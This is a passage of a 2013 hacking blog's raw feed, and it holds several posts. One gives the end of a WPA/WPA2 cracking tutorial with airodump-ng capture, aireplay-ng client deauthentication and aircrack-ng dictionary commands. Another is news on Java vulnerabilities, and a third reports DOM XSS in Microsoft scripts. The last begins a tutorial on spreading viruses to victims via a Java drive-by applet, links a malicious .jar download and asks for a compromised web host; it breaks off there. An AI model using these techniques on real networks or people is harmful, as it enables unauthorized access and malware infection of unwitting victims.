&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
This step assumes you've already set your wireless network interface in monitor mode. It can be checked by executing the iwconfig command. Next step is finding available wireless networks, and choosing your target:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Command # airodump-ng mon0&lt;/b&gt;  (Monitors all channels, listing available access points and associated clients within range.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-JeDgkWXIhMg/UVXSpQEI4_I/AAAAAAAAAFU/ADuDE4BDpPg/s1600/3.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="236" src="http://4.bp.blogspot.com/-JeDgkWXIhMg/UVXSpQEI4_I/AAAAAAAAAFU/ADuDE4BDpPg/s400/3.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;Step 3 : Capturing Packets&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
To capture data into a file, we use the airodump-ng tool again, with some additional switches to target a specific AP and channel. Assuming our wireless card is mon0, and we want to capture packets on channel 1 into a text file called data:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Command # airodump-ng -c 1 bssid AP_MAC -w data mon0&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-qXK2BBofSK4/UVXSpyiKl-I/AAAAAAAAAFc/Z8qscBPTstU/s1600/4.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="223" src="http://4.bp.blogspot.com/-qXK2BBofSK4/UVXSpyiKl-I/AAAAAAAAAFc/Z8qscBPTstU/s400/4.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;Step 4 : De-Authentication Technique&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
To successfully crack a WPA-PSK network, you first need a capture file containing handshake data. You may also try to deauthenticate an associated client to speed up this process of capturing a handshake, using:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Command # aireplay-ng --deauth 3 -a MAC_AP -c MAC_Client mon0&lt;/b&gt;  (where MAC_AP is the MAC address of the access point,  MAC_Client is the MAC address of an associated client.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-0X-bZw62rhs/UVXSqa8_OGI/AAAAAAAAAFo/K7eFOjJZyQ4/s1600/5.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="236" src="http://2.bp.blogspot.com/-0X-bZw62rhs/UVXSqa8_OGI/AAAAAAAAAFo/K7eFOjJZyQ4/s400/5.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;So, now we have successfully acquired a WPA Handshake.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-OeQDu1b7JjY/UVXSrK6AYuI/AAAAAAAAAF4/vvHQjuYTyBk/s1600/6-1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="123" src="http://2.bp.blogspot.com/-OeQDu1b7JjY/UVXSrK6AYuI/AAAAAAAAAF4/vvHQjuYTyBk/s400/6-1.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp;&lt;b&gt;Step 5 : Cracking WPA/WAP2&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
Once you have captured a four-way handshake, you also need a large/relevant dictinary file (commonly known as wordlists) with common passphrases.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Command # aircrack-ng -w wordlist ‘capture_file’.cap&lt;/b&gt; (where wordlist is your dictionary file, and capture_file is a .cap file with a valid WPA handshake) &lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-Rs7s_o58WSU/UVXSrm3XUgI/AAAAAAAAAF8/jfON9gUZOfE/s1600/7.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="220" src="http://3.bp.blogspot.com/-Rs7s_o58WSU/UVXSrm3XUgI/AAAAAAAAAF8/jfON9gUZOfE/s400/7.JPG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
Cracking WPA-PSK and WPA2-PSK only needs (a handshake). After that, an offline dictionary attack on that handshake takes much longer, and will only succeed with weak passphrases and good dictionary files.&lt;br /&gt;
Cracking WPA/WPA2 usually takes many hours, testing tens of millions of possible keys for the chance to stumble on a combination of common numerals or dictionary words. Still, a Weak/short/common/human-readable passphrase can be broken within a few minutes using an offline dictionary attack.&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #666666;"&gt;&lt;b&gt;About The Author&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="color: #666666;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;b&gt;Shaharyar Shafiq&lt;/b&gt; is doing Bachelors in Computer Engineering from Hamdard University. He has done &lt;b&gt;C|PTE&lt;/b&gt; (Certified Penetration Testing Engineering) and he is interested in network Penetration Testing and Forensics.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Sqfv973NC8g:YVlGYxt629o:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Sqfv973NC8g:YVlGYxt629o:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Sqfv973NC8g:YVlGYxt629o:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Sqfv973NC8g:YVlGYxt629o:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Sqfv973NC8g:YVlGYxt629o:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/Sqfv973NC8g" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/1931442873947177752/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/how-to-crack-wpa-key-with-aircrack-ng.html#comment-form" title="8 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1931442873947177752?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/1931442873947177752?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/Sqfv973NC8g/how-to-crack-wpa-key-with-aircrack-ng.html" title="How To Crack A WPA Key With Aircrack-ng" /><author><name>Shaharyar Shafiq</name><uri>https://plus.google.com/113862218722503273440</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/--k2pi9XiHU0/AAAAAAAAAAI/AAAAAAAAAHI/Kl1wAcIBxS4/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-6neXo2ztHSs/UVXcpch_yRI/AAAAAAAAAGA/jRiTyQo5Ofs/s72-c/How-to-Hack-Wifi-and-how-to-avoid-being-hacked-.jpg.gif" height="72" width="72" /><thr:total>8</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/how-to-crack-wpa-key-with-aircrack-ng.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkUMRnYzeyp7ImA9WhBXFEo.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-4938459677342403362</id><published>2013-03-28T04:12:00.000-07:00</published><updated>2013-03-28T04:31:27.883-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-28T04:31:27.883-07:00</app:edited><title>Java Hits Another Roadblock - Found To Be A Threat For Browsers</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-CGmzA4cTOJw/UVMC3rAz7tI/AAAAAAAABC8/fZOdgi3JSMg/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="444" src="http://4.bp.blogspot.com/-CGmzA4cTOJw/UVMC3rAz7tI/AAAAAAAABC8/fZOdgi3JSMg/s640/3.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Java has been the most talked about application in the past couple of months. Not because of its functionality but due to its &lt;a href="http://www.rafayhackingarticles.net/2013/03/java-zero-day-vulnerability-spotted-in.html" target="_blank"&gt;&lt;b&gt;&lt;span style="color: blue;"&gt;inability to refrain from being attacked and exploited&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;. Oracle has released emergency security patches to deal with the vulnerabilities in Java but to no avail. Java has been attacked over and over again by free-rollers and experts alike using &lt;a href="http://www.rafayhackingarticles.net/2013/03/how-attackers-spread-malware-with-java.html" target="_blank"&gt;&lt;b&gt;&lt;span style="color: blue;"&gt;various tactics&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
According to a report about a 100 million PCs are vulnerable to various attacks leading to&amp;nbsp;unauthorized&amp;nbsp;access through Java's unstable software. If things weren't bad enough for the software already, Department of Homeland Security issued a warning to all PC users to disable Java on their systems.&lt;br /&gt;
&lt;br /&gt;
Experts at Websense decided to do a little bit of research on the topic. Therefore, coming up with a list of Java vulnerabilities, versions affected etc.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-kjM_eoS76e8/UVMCYyE5dgI/AAAAAAAABCs/DxbRD5YF84s/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="155" src="http://2.bp.blogspot.com/-kjM_eoS76e8/UVMCYyE5dgI/AAAAAAAABCs/DxbRD5YF84s/s640/2.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;
&lt;b&gt;&lt;u&gt;According to &lt;a href="http://community.websense.com/blogs/securitylabs/archive/2013/03/25/how-are-java-attacks-getting-through.aspx" rel="nofollow" target="_blank"&gt;&lt;span style="color: blue;"&gt;Websense&lt;/span&gt;&lt;/a&gt;;&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;It is probably no surprise that the largest single exploited vulnerability is the most recent one,&amp;nbsp;with a vulnerable population of browsers at 93.77%.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"&gt;That's what the bad guys do&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; font-family: inherit; line-height: 17px; margin: 0px; padding: 0px; text-align: -webkit-auto;"&gt;—&lt;/span&gt;&lt;span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"&gt;&amp;nbsp;examine your security controls and find the easiest way to bypass them. Grabbing a copy of the latest version of Cool and using a pre-packaged exploit is a pretty low bar to go after such a large population of vulnerable browsers.&lt;/span&gt;&lt;/blockquote&gt;
&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"&gt;Most browsers are vulnerable to a much broader array of well-known Java holes, with over 75% using versions that are at least six months old, nearly two-thirds being more than a year out of date, and&amp;nbsp;&lt;/span&gt;&lt;i style="background-color: white; font-family: inherit; line-height: 17px; margin: 0px; padding: 0px; text-align: -webkit-auto;"&gt;more than 50% of browsers are greater than two years behind the times with respect to Java vulnerabilities&lt;/i&gt;&lt;span style="background-color: white; font-family: inherit; line-height: 17px; text-align: -webkit-auto;"&gt;. And don't forget that if you're not on version 7 (which is 78.86% of you),&amp;nbsp;&lt;/span&gt;&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;Oracle won't be sending you any more updates even if new vulnerabilities are uncovered.&lt;/span&gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;Cheers!&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: -webkit-auto;"&gt;
&lt;span style="line-height: 17px;"&gt;&lt;b&gt;About the Author:&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: -webkit-auto;"&gt;
&lt;span style="line-height: 17px;"&gt;This article has been written by Dr. Sindhia Javed Junejo. She is one of the core members of RHA team.&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-family: inherit;"&gt;&lt;span style="background-color: white; line-height: 17px; text-align: -webkit-auto;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=E1Da2IYn86s:TSHwsY_IhRQ:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=E1Da2IYn86s:TSHwsY_IhRQ:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=E1Da2IYn86s:TSHwsY_IhRQ:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=E1Da2IYn86s:TSHwsY_IhRQ:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=E1Da2IYn86s:TSHwsY_IhRQ:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/E1Da2IYn86s" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4938459677342403362/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/java-hits-another-roadblock-found-to-be.html#comment-form" title="3 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4938459677342403362?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4938459677342403362?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/E1Da2IYn86s/java-hits-another-roadblock-found-to-be.html" title="Java Hits Another Roadblock - Found To Be A Threat For Browsers" /><author><name>Dr. Sindhia Javed Junejo</name><uri>http://www.blogger.com/profile/01429590087313279750</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="http://4.bp.blogspot.com/-q7qO-M4AY2E/UIRbUxdSx8I/AAAAAAAAAwE/dUwQNL1DQVk/s220/V_mask.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-CGmzA4cTOJw/UVMC3rAz7tI/AAAAAAAABC8/fZOdgi3JSMg/s72-c/3.png" height="72" width="72" /><thr:total>3</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/java-hits-another-roadblock-found-to-be.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0MCR34zfip7ImA9WhBQF0U.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8672820372953528818</id><published>2013-03-20T05:11:00.001-07:00</published><updated>2013-03-20T05:11:06.086-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-20T05:11:06.086-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="DOM XSS" /><title>DOM Based XSS In Microsoft</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;img src="https://twimg0-a.akamaihd.net/profile_images/1272438885/DOMInatrixss.png" style="background-color: white; color: #333333; font-family: Verdana; font-size: 11.818181991577148px; line-height: 19.190340042114258px; padding: 10px; text-align: center;" /&gt;&lt;br /&gt;
Lately, i have been researching on DOM based XSS a bit, In my previous post i talked about the &lt;a href="http://www.rafayhackingarticles.net/2013/02/dom-based-xss-in-avg.html"&gt;DOM based XSS i found inside AVG&lt;/a&gt;, DOM based XSS is caused due to lack of input filtering inside client side javascripts, since most of the code is moving towards client side, therefore DOM based xss have been very common now a days, It is predicted by the experts that the DOM based xss mostly occurs in the websites that heavily rely upon javascripts.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
I have reported several DOM based XSS inside Microsoft, most of them were due to the lack of input filtering/sanitization inside of the several tracking scripts such as sitecatalyst and riotracking scripts as they often introduce some vulnerable sources and sinks. With that being said, let's take a look at the POC of the attack:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-2PYA71gPERw/UUmmdH0zz1I/AAAAAAAACtI/TnQobLOdsE0/s1600/MS+DOMXSS.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="280" src="http://2.bp.blogspot.com/-2PYA71gPERw/UUmmdH0zz1I/AAAAAAAACtI/TnQobLOdsE0/s640/MS+DOMXSS.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The vulnerability occurs due to lack of filtering being done inside &lt;b&gt;riotracking script &lt;/b&gt;(Line 58), There are other microsoft domains that are also using the same tracking script vulnerable to DOM based XSS, see if you can find one?.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-4zTKK1lwozo/UUmmWDguzNI/AAAAAAAACtA/1_th5sxK9Hk/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="182" src="http://4.bp.blogspot.com/-4zTKK1lwozo/UUmmWDguzNI/AAAAAAAACtA/1_th5sxK9Hk/s640/Untitled.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Gy91euT5Vx0:roqyBTXO-wA:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Gy91euT5Vx0:roqyBTXO-wA:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Gy91euT5Vx0:roqyBTXO-wA:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=Gy91euT5Vx0:roqyBTXO-wA:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=Gy91euT5Vx0:roqyBTXO-wA:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/Gy91euT5Vx0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8672820372953528818/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/03/dom-based-xss-in-microsoft.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8672820372953528818?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8672820372953528818?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/Gy91euT5Vx0/dom-based-xss-in-microsoft.html" title="DOM Based XSS In Microsoft" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-2PYA71gPERw/UUmmdH0zz1I/AAAAAAAACtI/TnQobLOdsE0/s72-c/MS+DOMXSS.png" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/03/dom-based-xss-in-microsoft.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0UDSXY5eCp7ImA9WhBQF08.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-6582487803810754179</id><published>2013-03-19T12:27:00.002-07:00</published><updated>2013-03-19T12:27:58.820-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-03-19T12:27:58.820-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Computer hacking" /><category scheme="http://www.blogger.com/atom/ns#" term="Website hacking" /><title>How Attackers Spread Malware With Java Drive by?</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.foto.pk/images/cpature.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://www.foto.pk/images/cpature.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Hello RHA fans,&lt;br /&gt;
&lt;br /&gt;
We are back with a new tutorial. 
Well making a malicious virus is one thing but how to spread it? Or how hackers hunt for victims? Well you will definitely be disappointed when you’ll know that this 
trick fails sometimes! Victims are now mostly aware of the old social engineering stuff. &amp;nbsp;But cheers up my 
friend there's no end, i will show you a very effective methods that attackers use to spread malicious viruses/worms.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;
Well In this tutorial RHA will show you to spread virus with JAVA DRIVE 
BY!&lt;br /&gt;
&lt;h4&gt;
What is java drive by:&lt;/h4&gt;
A Java Drive-By is a Java Applet that is coded in Java, when placed on a website. Once you click &lt;b&gt;"Run&lt;/b&gt;" on the pop-up, it will download a program off the internet. This program can be used to spread a virus and malware effectively and has been spotted in the wild. We can execute .exe files in victims’ computer without their 
permission with the help of java drive by. You can see the image of 
error below this:&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://foto.pk/images/capturlcl.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="270" src="http://foto.pk/images/capturlcl.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
Okay so whats the scenario behind this? well this is a java script in 
the source which pop ups the error, So lets learn how to do the job.
&lt;br /&gt;
&lt;h4&gt;
Tools we need in this game are:
&lt;/h4&gt;
&lt;b&gt;i) &lt;/b&gt;a .jar file which is the main player of this game. Download it from here &lt;b&gt;http://www.mediafire.com/?mmafl2carb1s159
&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;ii) &lt;/b&gt;A shelled web where you will upload files for JAVA DRIVE BY! Plus you should know basic HTML to make a attractive web page.
&lt;br /&gt;
&lt;b&gt;iii) &lt;/b&gt;A java script which is the backbone of your game.
&lt;br /&gt;
&lt;br /&gt;
